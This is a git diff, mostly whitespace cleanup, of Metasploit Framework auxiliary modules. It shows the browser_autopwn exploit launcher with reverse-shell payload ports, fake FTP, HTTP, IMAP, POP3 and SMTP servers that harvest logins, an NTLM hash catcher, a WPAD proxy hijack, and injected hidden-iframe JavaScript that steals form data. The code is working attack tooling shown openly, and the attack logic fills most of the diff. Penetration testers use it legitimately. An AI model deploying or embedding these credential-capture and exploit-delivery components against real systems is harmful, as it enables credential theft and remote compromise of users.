DOES NOT match this regex' ]), - OptBool.new('DEBUG', [false, + OptBool.new('DEBUG', [false, 'Do not obfuscate the javascript and print various bits of useful info to the browser', false ]), - OptPort.new('LPORT_WIN32', [false, + OptPort.new('LPORT_WIN32', [false, 'The port to use for Windows reverse-connect payloads, default is 3333' ]), - OptPort.new('LPORT_LINUX', [false, + OptPort.new('LPORT_LINUX', [false, 'The port to use for Linux reverse-connect payloads, default is 4444' ]), - OptPort.new('LPORT_MAC', [false, + OptPort.new('LPORT_MAC', [false, 'The port to use for Mac reverse-connect payloads, default is 5555' ]), - OptPort.new('LPORT_GENERIC', [false, + OptPort.new('LPORT_GENERIC', [false, 'The port to use for generic reverse-connect payloads, default is 6666' ]), ], self.class) 
@@ -110,14 +110,14 @@ class Metasploit3 < Msf::Auxiliary print_status("Found #{@exploits.length} exploit modules") elsif (action.name == 'DefangedDetection') exploit() - else + else start_exploit_modules() if @exploits.length < 1 print_error("No exploits, check your MATCH and EXCLUDE settings") return false end exploit() - end + end end @@ -131,11 +131,11 @@ class Metasploit3 < Msf::Auxiliary function make_xhr() { var xhr; - try { - xhr = new XMLHttpRequest(); + try { + xhr = new XMLHttpRequest(); } catch(e) { - try { - xhr = new ActiveXObject("Microsoft.XMLHTTP"); + try { + xhr = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xhr = new ActiveXObject("MSXML2.ServerXMLHTTP"); } @@ -271,7 +271,7 @@ class Metasploit3 < Msf::Auxiliary else lport = @gen_lport payload='generic/shell_reverse_tcp' - end + end @payloads[lport] = payload print_status("Starting exploit #{name} with payload #{payload}") @@ -281,9 +281,9 @@ class Metasploit3 < Msf::Auxiliary # For testing, set the exploit uri to the name of the exploit so it's # easy to tell what is happening from the browser. if (datastore['DEBUG']) - @exploits[name].datastore['URIPATH'] = name + @exploits[name].datastore['URIPATH'] = name else - @exploits[name].datastore['URIPATH'] = nil + @exploits[name].datastore['URIPATH'] = nil end @exploits[name].datastore['LPORT'] = lport @@ -312,7 +312,7 @@ class Metasploit3 < Msf::Auxiliary end - def start_exploit_modules() + def start_exploit_modules() @lhost = (datastore['LHOST'] || "0.0.0.0") @js_tests = {} 
@@ -338,12 +338,12 @@ class Metasploit3 < Msf::Auxiliary apo[:vuln_test] = "" apo[:ua_name] = HttpClients::IE if apo[:classid].kind_of?(Array) # then it's many classids - apo[:classid].each { |clsid| + apo[:classid].each { |clsid| apo[:vuln_test] << "if (testAXO('#{clsid}', '#{method}')) {\n" apo[:vuln_test] << " is_vuln = true;\n" apo[:vuln_test] << "}\n" } - else + else apo[:vuln_test] << "if (testAXO('#{apo[:classid]}', '#{method}')) {\n" apo[:vuln_test] << " is_vuln = true;\n" apo[:vuln_test] << "}\n" @@ -351,7 +351,7 @@ class Metasploit3 < Msf::Auxiliary end if apo[:ua_minver] and apo[:ua_maxver] - ver_test = + ver_test = "!ua_ver_lt(detected_version.#{@init_js.sym("ua_version")}, '#{apo[:ua_minver]}') && " + "!ua_ver_gt(detected_version.#{@init_js.sym("ua_version")}, '#{apo[:ua_maxver]}')" elsif apo[:ua_minver] @@ -420,14 +420,14 @@ class Metasploit3 < Msf::Auxiliary @js_tests.each { |browser,tests| tests.sort! {|a,b| b[:rank] <=> a[:rank]} } - + @noscript_tests.each { |browser,tests| tests.sort! {|a,b| b[:rank] <=> a[:rank]} } end - def on_request_uri(cli, request) + def on_request_uri(cli, request) print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}") case request.uri @@ -453,7 +453,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Responding with exploits") response = build_script_response(cli, request) end - + cli.send_response(response) when %r{^#{self.get_resource}.*ns=1} # This is the request for the exploit page when javascript is NOT @@ -470,7 +470,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Responding with non-javascript exploits") response = build_noscript_response(cli, request) end - + response["Expires"] = "0" response["Cache-Control"] = "must-revalidate" cli.send_response(response) 
@@ -607,7 +607,7 @@ class Metasploit3 < Msf::Auxiliary } else { test = "try {" + test + "} catch (e) { is_vuln = false; }; is_vuln"; } - //alert("next_exploit(" + (exploit_idx).toString() + ") => " + + //alert("next_exploit(" + (exploit_idx).toString() + ") => " + // global_exploit_list[exploit_idx].resource + "\\n" + // test + " -- " + eval(test) //); @@ -618,7 +618,7 @@ class Metasploit3 < Msf::Auxiliary #{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '<br>'")} next_exploit(exploit_idx+1); } - } catch(e) { + } catch(e) { next_exploit(exploit_idx+1); }; } @@ -699,9 +699,9 @@ class Metasploit3 < Msf::Auxiliary data_offset = request.uri.index('sessid=') #p request['User-Agent'] - if (data_offset.nil? or -1 == data_offset) + if (data_offset.nil? or -1 == data_offset) # then we didn't get a report back from our javascript - # detection; make a best guess effort from information + # detection; make a best guess effort from information # in the user agent string. The OS detection should be # roughly the same as the javascript version on non-IE # browsers because it does most everything with @@ -743,7 +743,7 @@ class Metasploit3 < Msf::Auxiliary @targetcache[key] ||= {} @targetcache[key][:updated_at] = Time.now.to_i - # Clean the cache + # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:updated_at]+60) diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 7e3e9368c4..10ba44365d 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: FTP', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -54,18 +54,18 @@ class Metasploit3 < Msf::Auxiliary def run exploit() end - + def on_client_connect(c) @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil} c.put "220 FTP Server Ready\r\n" end - + def on_client_data(c) data = c.get_once return if not data cmd,arg = data.strip.split(/\s+/, 2) arg ||= "" - + if(cmd.upcase == "USER") @state[c][:user] = arg c.put "331 User name okay, need password...\r\n" @@ -76,10 +76,10 @@ class Metasploit3 < Msf::Auxiliary c.put "221 Logout\r\n" return end - + if(cmd.upcase == "PASS") @state[c][:pass] = arg - + report_auth_info( :host => @state[c][:ip], :proto => 'ftp', @@ -88,16 +88,16 @@ class Metasploit3 < Msf::Auxiliary :user => @state[c][:user], :pass => @state[c][:pass] ) - + print_status("FTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}") end @state[c][:pass] = data.strip c.put "500 Error\r\n" return - + end - + def on_client_close(c) @state.delete(c) end diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 4bf2a750f7..55b41ed551 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: HTTP', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -43,15 +43,15 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]), - OptPath.new('TEMPLATE', [ false, "The HTML template to serve in responses", + OptPath.new('TEMPLATE', [ false, "The HTML template to serve in responses", File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "index.html") ] ), - OptPath.new('SITELIST', [ false, "The list of URLs that should be used for cookie capture", + OptPath.new('SITELIST', [ false, "The list of URLs that should be used for cookie capture", File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "sites.txt") ] ), - OptPath.new('FORMSDIR', [ false, "The directory containing form snippets (example.com.txt)", + OptPath.new('FORMSDIR', [ false, "The directory containing form snippets (example.com.txt)", File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "forms") ] ), @@ -67,24 +67,24 @@ class Metasploit3 < Msf::Auxiliary @sitelist = datastore['SITELIST'] @myhost = datastore['SRVHOST'] @myport = datastore['SRVPORT'] - + @myautopwn_host = datastore['AUTOPWN_HOST'] @myautopwn_port = datastore['AUTOPWN_PORT'] @myautopwn_uri = datastore['AUTOPWN_URI'] @myautopwn = false - + if(@myautopwn_host and @myautopwn_port and @myautopwn_uri) @myautopwn = true end - + exploit() end - + def on_client_connect(c) c.extend(Rex::Proto::Http::ServerClient) c.init_cli(self) end - + def on_client_data(cli) begin data = cli.get_once(-1, 5) @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Exception print_status("Error: #{$!.class} #{$!} #{$!.backtrace}") end - + close_client(cli) end 
@@ -110,22 +110,22 @@ class Metasploit3 < Msf::Auxiliary # Require to clean up the service properly raise ::EOFError end - + def dispatch_request(cli, req) - + phost = cli.peerhost - + os_name = nil os_type = nil os_vers = nil os_arch = 'x86' - + ua_name = nil ua_vers = nil - + ua = req['User-Agent'] - case (ua) + case (ua) when /rv:([\d\.]+)/ ua_name = 'FF' ua_vers = $1 @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary ua_name = 'Safari' ua_vers = $1 end - + case (ua) when /Windows/ os_name = 'Windows' @@ -148,17 +148,17 @@ class Metasploit3 < Msf::Auxiliary when /Mac OS X/ os_name = 'Mac' end - + case (ua) when /PPC/ os_arch = 'ppc' end - + os_name ||= 'Unknown' - + mysrc = Rex::Socket.source_address(cli.peerhost) hhead = (req['Host'] || @myhost).split(':', 2)[0] - + if (req.resource =~ /^http\:\/+([^\/]+)(\/*.*)/) req.resource = $2 hhead, nport = $1.split(":", 2)[0] @@ -167,8 +167,8 @@ class Metasploit3 < Msf::Auxiliary cookies = req['Cookie'] || '' - - + + if(cookies.length > 0) report_note( :host => cli.peerhost, @@ -176,7 +176,7 @@ class Metasploit3 < Msf::Auxiliary :data => hhead + " " + cookies ) end - + if(req['Authorization'] and req['Authorization'] =~ /basic/i) basic,auth = req['Authorization'].split(/\s+/) @@ -192,11 +192,11 @@ class Metasploit3 < Msf::Auxiliary ) print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}") end - - - if(req.resource =~ /^\/*wpad.dat|.*\.pac$/i) + + + if(req.resource =~ /^\/*wpad.dat|.*\.pac$/i) prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }" - res = + res = "HTTP/1.1 200 OK\r\n" + "Host: #{hhead}\r\n" + "Content-Type: application/x-ns-proxy-autoconfig\r\n" + @@ -206,9 +206,9 @@ class Metasploit3 < Msf::Auxiliary cli.put(res) return end - - - if(req.resource =~ /\/+formrec\/(.*)/i) + + + if(req.resource =~ /\/+formrec\/(.*)/i) data = Rex::Text.uri_decode($1).split("\x00").join(", ") report_note( 
@@ -216,14 +216,14 @@ class Metasploit3 < Msf::Auxiliary :type => "http_formdata", :data => hhead + " " + data ) - - res = + + res = "HTTP/1.1 200 OK\r\n" + "Host: #{hhead}\r\n" + "Content-Type: text/html\r\n" + "Content-Length: 4\r\n" + "Connection: Close\r\n\r\nBYE!" - + print_status("HTTP form data received for #{hhead} from #{cli.peerhost} (#{data})") cli.put(res) return @@ -234,12 +234,12 @@ class Metasploit3 < Msf::Auxiliary :type => "http_request", :data => "#{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers}" ) - + print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers} cookies=#{cookies}") - + if(req.resource =~ /\/+forms.html$/) frm = inject_forms(hhead) - res = + res = "HTTP/1.1 200 OK\r\n" + "Host: #{hhead}\r\n" + "Content-Type: text/html\r\n" + @@ -248,19 +248,19 @@ class Metasploit3 < Msf::Auxiliary cli.put(res) return end - - + + # http://us.version.worldofwarcraft.com/update/PatchSequenceFile.txt if(req.resource == "/update/PatchSequenceFile.txt") - print_status("HTTP #{cli.peerhost} is trying to play World of Warcraft") + print_status("HTTP #{cli.peerhost} is trying to play World of Warcraft") end - - + + # Microsoft 'Network Connectivity Status Indicator' Vista if (req['Host'] == 'www.msftncsi.com') print_status("HTTP #{cli.peerhost} requested the Network Connectivity Status Indicator page (Vista)") data = "Microsoft NCSI" - res = + res = "HTTP/1.1 200 OK\r\n" + "Host: www.msftncsi.com\r\n" + "Expires: 0\r\n" + 
@@ -269,14 +269,14 @@ class Metasploit3 < Msf::Auxiliary "Content-Length: #{data.length}\r\n" + "Connection: Close\r\n\r\n#{data}" cli.put(res) - return + return end -=begin +=begin # Apple 'Network Status' Check (prevents a pop-up safari on the iphone) if(req['Host'] == 'www.apple.com' and req.resource == '/library/test/success.html') data = "\x3c\x21\x44\x4f\x43\x54\x59\x50\x45\x20\x48\x54\x4d\x4c\x20\x50\x55\x42\x4c\x49\x43\x20\x22\x2d\x2f\x2f\x57\x33\x43\x2f\x2f\x44\x54\x44\x20\x48\x54\x4d\x4c\x20\x33\x2e\x32\x2f\x2f\x45\x4e\x22\x3e\x0a\x3c\x48\x54\x4d\x4c\x3e\x0a\x3c\x48\x45\x41\x44\x3e\x0a\x09\x3c\x54\x49\x54\x4c\x45\x3e\x53\x75\x63\x63\x65\x73\x73\x3c\x2f\x54\x49\x54\x4c\x45\x3e\x0a\x3c\x2f\x48\x45\x41\x44\x3e\x0a\x3c\x42\x4f\x44\x59\x3e\x0a\x53\x75\x63\x63\x65\x73\x73\x0a\x3c\x2f\x42\x4f\x44\x59\x3e\x0a\x3c\x2f\x48\x54\x4d\x4c\x3e\x0a" - res = + res = "HTTP/1.1 200 OK\r\n" + "Host: www.apple.com\r\n" + "Expires: 0\r\n" + @@ -293,22 +293,22 @@ class Metasploit3 < Msf::Auxiliary if (req['Host'] == 'activex.microsoft.com') print_status("HTTP #{cli.peerhost} attempted to download an ActiveX control") data = "" - res = + res = "HTTP/1.1 404 Not Found\r\n" + "Host: #{mysrc}\r\n" + "Content-Type: application/octet-stream\r\n" + "Content-Length: #{data.length}\r\n" + "Connection: Close\r\n\r\n#{data}" cli.put(res) - return + return end - + # Sonic.com's Update Service if (req['Host'] == 'updateservice.sonic.com') print_status("HTTP #{cli.peerhost} is running a Sonic.com product that checks for online updates") - end - + end + # The google maps / stocks view on the iPhone if (req['Host'] == 'iphone-wu.apple.com') case req.resource 
@@ -320,9 +320,9 @@ class Metasploit3 < Msf::Auxiliary print_status("HTTP #{cli.peerhost} is request #{req.resource} via the iPhone") end end - + # The itunes store on the iPhone - if(req['Host'] == 'phobos.apple.com') + if(req['Host'] == 'phobos.apple.com') print_status("HTTP #{cli.peerhost} is using iTunes Store on the iPhone") # GET /bag.xml end @@ -336,13 +336,13 @@ class Metasploit3 < Msf::Auxiliary "png" => "image/png", "gif" => "image/gif", } - + req_ext = req.resource.split(".")[-1].downcase - + if(ctypes[req_ext]) ctype = ctypes['gif'] - data = + data = "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00" + "\x00\xff\xff\xff\xff\xff\xff\x2c\x00\x00\x00\x00" + "\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b" @@ -357,14 +357,14 @@ class Metasploit3 < Msf::Auxiliary return end - + buff = '' if(@myautopwn) buff << "<iframe src='http://#{@myautopwn_host}:#{@myautopwn_port}#{@myautopwn_uri}'></iframe>" end - + list = File.readlines(@sitelist) list.each do |site| next if site =~ /^#/ @@ -372,11 +372,11 @@ class Metasploit3 < Msf::Auxiliary next if site.length == 0 buff << "<iframe src='http://#{site}:#{@myport}/forms.html'></iframe>" end - + data = File.read(@template) data.gsub!(/%CONTENT%/, buff) - - res = + + res = "HTTP/1.1 200 OK\r\n" + "Host: #{mysrc}\r\n" + "Expires: 0\r\n" + @@ -386,16 +386,16 @@ class Metasploit3 < Msf::Auxiliary "Connection: Close\r\n\r\n#{data}" cli.put(res) - return - + return + end - - + + def inject_forms(site) domain = site.gsub(/(\.\.|\\|\/)/, "") domain = "www." + domain if domain !~ /^www/i - + while(domain.length > 0) form_file = File.join(@formsdir, domain) + ".txt" 
@@ -404,24 +404,24 @@ class Metasploit3 < Msf::Auxiliary form_data = File.read(form_file) break end - + parts = domain.split(".") parts.shift domain = parts.join(".") end - + %| <html> <head> <script language="javascript"> - function processForms() { + function processForms() { var i = 0; while(form = document.forms[i]) { - + res = ""; var x = 0; var f = 0; - + while(e = form.elements[x]) { if (e.name.length > 0 && e.value.length > 0 && e.value != "on"){ res += e.name + "=" + e.value + "\x00"; @@ -429,7 +429,7 @@ class Metasploit3 < Msf::Auxiliary } x++; } - + if(f) { url = "http://"+document.domain+":#{@myport}/formrec/" + escape(res); fra = document.createElement("iframe"); @@ -437,7 +437,7 @@ class Metasploit3 < Msf::Auxiliary fra.style.visibility = 'hidden'; document.body.appendChild(fra); } - + i++; } } @@ -449,8 +449,8 @@ class Metasploit3 < Msf::Auxiliary </body> </html> -| - +| + end end diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 605c300ae1..cb4f9bd3f0 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'rex/proto/smb/utils' require 'rex/proto/smb/constants' @@ -10,15 +21,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Client MS Credential Catcher', 'Version' => '$$', 'Description' => %q{ This module attempts to quietly catch NTLM/LM Challenge hashes. }, - 'Author' => + 'Author' => [ 'Ryan Linn <sussurro[at]happypacket.net>', ], 
@@ -27,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'WebServer' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'WebServer' ], @@ -36,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary register_options([ OptString.new('LOGFILE', [ false, "The local filename to store the captured hashes", nil ]), OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ]) - + ], self.class) register_advanced_options([ OptString.new('DOMAIN', [ false, "The default domain to use for NTLM authentication", "DOMAIN"]), @@ -45,12 +56,12 @@ class Metasploit3 < Msf::Auxiliary OptString.new('DNSDOMAIN', [ false, "The default DNS domain name to use for NTLM authentication", "example.com"]), OptBool.new('FORCEDEFAULT', [ false, "Force the default settings", false]) ], self.class) - + @challenge = "\x11\x22\x33\x44\x55\x66\x77\x88" end - - def on_request_uri(cli, request) + + def on_request_uri(cli, request) print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}") case request.uri when %r{^#{datastore['URIPATH']}.*sessid=} @@ -108,13 +119,13 @@ class Metasploit3 < Msf::Auxiliary chalhash = UTILS.process_type1_message(hash,@challenge,domain,server,dnsname,dnsdomain) response.headers['WWW-Authenticate'] = "NTLM " + chalhash return response - + #if the message is a type 3 message, then we have our creds elsif(message[8] == 0x03) domain,user,host,lm_hash,ntlm_hash = UTILS.process_type3_message(hash) print_status("#{cli.peerhost}: #{domain}\\#{user} #{lm_hash}:#{ntlm_hash} on #{host}") - - if(datastore['LOGFILE']) + + if(datastore['LOGFILE']) fd = File.open(datastore['LOGFILE'], "a") fd.puts( [ @@ -129,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary ) fd.close end - + if(datastore['PWFILE'] and user and lm_hash) fd = File.open(datastore['PWFILE'], "a+") fd.puts( 
@@ -141,8 +152,8 @@ class Metasploit3 < Msf::Auxiliary ntlm_hash ? ntlm_hash : "0" * 32 ].join(":").gsub(/\n/, "\\n") ) - fd.close - + fd.close + end response = create_response(200) return response @@ -152,11 +163,11 @@ class Metasploit3 < Msf::Auxiliary end end - + def parse_type1_domain(message) domain = nil workstation = nil - + reqflags = message[12..15] reqflags = Integer("0x" + reqflags.unpack("h8").to_s.reverse) @@ -171,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary workstation = message[wor_off,wor_len].to_s end return domain,workstation - + end - + end diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 4a9d0eca17..0b09ff0aee 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: IMAP', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], 
@@ -54,24 +54,24 @@ class Metasploit3 < Msf::Auxiliary def run exploit() end - + def on_client_connect(c) @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil} c.put "* OK IMAP4\r\n" end - + def on_client_data(c) data = c.get_once return if not data num,cmd,arg = data.strip.split(/\s+/, 3) arg ||= "" - - - if(cmd.upcase == "CAPABILITY") + + + if(cmd.upcase == "CAPABILITY") c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI AUTH=XYMECOOKIE ID\r\n" c.put "#{num} OK CAPABILITY completed.\r\n" end - + if(cmd.upcase == "AUTHENTICATE" and arg.upcase == "XYMPKI") c.put "+ \r\n" cookie1 = c.get_once @@ -85,9 +85,9 @@ class Metasploit3 < Msf::Auxiliary :user => cookie1, :pass => cookie2 ) - return + return end - + if(cmd.upcase == "LOGIN") @state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2) @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}") return end - + if(cmd.upcase == "LOGOUT") c.put("* BYE IMAP4rev1 Server logging out\r\n") c.put("#{num} OK LOGOUT completed\r\n") @@ -112,9 +112,9 @@ class Metasploit3 < Msf::Auxiliary @state[c][:pass] = data.strip c.put "#{num} NO LOGIN FAILURE\r\n" return - + end - + def on_client_close(c) @state.delete(c) end diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index f204ba049f..928d02242b 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: POP3', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -56,18 +56,18 @@ class Metasploit3 < Msf::Auxiliary @myport = datastore['SRVPORT'] exploit() end - + def on_client_connect(c) @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil} c.put "+OK\r\n" end - + def on_client_data(c) data = c.get_once return if not data cmd,arg = data.strip.split(/\s+/, 2) arg ||= "" - + if(cmd.upcase == "USER") @state[c][:user] = arg c.put "+OK\r\n" @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary if(cmd.upcase == "PASS") @state[c][:pass] = arg - + report_auth_info( :host => @state[c][:ip], :proto => 'pop3', @@ -88,33 +88,33 @@ class Metasploit3 < Msf::Auxiliary print_status("POP3 LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}") @state[c][:pass] = data.strip c.put "+OK\r\n" - return + return end if(cmd.upcase == "STAT") c.put "+OK 0 0\r\n" - return + return end if(cmd.upcase == "CAPA") c.put "-ERR No Extended Capabilities\r\n" - return + return end if(cmd.upcase == "LIST") c.put "+OK 0 Messages\r\n" - return + return end if(cmd.upcase == "QUIT" || cmd.upcase == "RSET" || cmd.upcase == "DELE") c.put "+OK\r\n" - return + return end - + print_status("POP3 UNKNOWN CMD #{@state[c][:name]} \"#{data.strip}\"") c.put "+OK\r\n" end - + def on_client_close(c) @state.delete(c) end 
diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index 22b1ec1165..ec0243ce77 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: SMTP', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -54,23 +54,23 @@ class Metasploit3 < Msf::Auxiliary def run exploit() end - + def on_client_connect(c) @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil} c.put "220 SMTP Server Ready\r\n" end - + def on_client_data(c) data = c.get_once return if not data - + print_status("SMTP: #{data.strip}") - + if(@state[c][:data_mode]) - + @state[c][:data_buff] ||= '' @state[c][:data_buff] += data - + idx = @state[c][:data_buff].index("\r\n.\r\n") if(idx) report_note( 
@@ -82,44 +82,44 @@ class Metasploit3 < Msf::Auxiliary @state[c][:data_mode] = nil c.put "250 OK\r\n" end - + return end - - + + cmd,arg = data.strip.split(/\s+/, 2) arg ||= "" - + case cmd.upcase when 'HELO', 'EHLO' c.put "250 OK\r\n" return - + when 'MAIL' x,from = data.strip.split(":", 2) @state[c][:from] = from.strip c.put "250 OK\r\n" return - + when 'RCPT' x,targ = data.strip.split(":", 2) @state[c][:rcpt] = targ.strip c.put "250 OK\r\n" return - + when 'DATA' @state[c][:data_mode] = true c.put "500 Error\r\n" return - + when 'QUIT' c.put "221 OK\r\n" return - + when 'PASS' - + @state[c][:pass] = arg - + report_auth_info( :host => @state[c][:ip], :proto => 'pop3', @@ -133,9 +133,9 @@ class Metasploit3 < Msf::Auxiliary c.put "503 Server Error\r\n" return - + end - + def on_client_close(c) @state.delete(c) end diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 6ec496b842..b481d29746 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'DNS Spoofing Helper Service', @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary This module provides a DNS service that returns TXT records indicating information about the querying service. Based on Dino Dai Zovi DNS code from Karma. - + }, 'Author' => ['hdm', 'ddz'], 'License' => MSF_LICENSE, @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Service' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Service' ], 
